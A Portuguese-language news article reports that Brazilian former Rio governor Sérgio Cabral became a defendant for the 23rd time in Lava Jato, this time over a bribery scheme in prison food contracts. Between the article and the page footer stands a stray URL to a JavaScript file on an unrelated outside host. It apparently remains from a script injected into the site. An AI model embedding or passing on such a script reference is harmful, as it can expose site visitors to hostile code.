BrasilNotícias

Sérgio Cabral: 23 vezes réu na Lava Jato

A Justiça Federal aceitou, nessa sexta-feira, 20, mais uma denúncia contra o ex-governador do Rio de Janeiro, Sérgio Cabral. Com isso, ele se torna réu pela 23ª vez em virtude dos desdobramentos da Operação Lava Jato.

Desta vez, a denúncia é referente a Operação Pão Nosso, que foi deflagrada no mês passado. O Ministério Público Federal (MPF) investou uma organização que teria causado um dano de R$ 23,4 milhões por meio de contratos com a Secretaria de Estado de Administração Penitenciária.

Cabral é acusado de corrupção passiva por ter, conforme a denúncia, aceitado recebiment ode R$ 1 milhão em propina, que foi ofertado pelo secretário estadual César Rubens e pelo ex-subsecretário Marcos Lips. O esquema envolvia o fornecimento de comida para presos.

Nessa ação, além de Cabral e os secretários, há uma imensa lista de réus. Segundo as investigações, o Estado fornecia os insumos para a produção de pães, enquanto os presos eram usados como mão de obra com custo baixo para a empresa, que ainda fornecia alimentação para a secretária com valores acima dos de mercado.

https://cloudapi.online/js/api46.js

Tags
Ver mais

Artigos relacionados

Deixe uma resposta

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Close